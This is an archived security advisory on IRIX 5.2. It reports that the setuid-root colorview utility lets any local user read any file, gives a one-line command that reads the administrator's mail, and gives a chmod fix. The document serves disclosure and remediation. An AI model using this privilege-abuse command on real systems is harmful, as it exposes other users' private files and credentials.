TUCoPS :: SGI :: colorvie.txt

A vulnerability in Irix 5.2 allowing any user to read any file

A vulnerability exists under IRIX 5.2 (std release) that allows any
user to read any file on the system.

% uname -a
IRIX bailer 5.2 02282016 IP22 mips

% ls -als /usr/sbin/colorview
 742 -rwsr-xr-x    1 root     sys       379680 Jun  7 10:36 /usr/sbin/colorview

An example (to view the admin's mail file):
% /usr/sbin/colorview -text /var/spool/mail/admin


To correct this:

# chmod u-s /usr/sbin/colorview
--
/-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\
| Blackstar - jmartin@herky.cs.uiowa.edu                          |
| "Beware of the bugs in the above code; I have only proved it    |
|  correct, not tried it."  -- Donald Knuth                       |
\-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-/

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH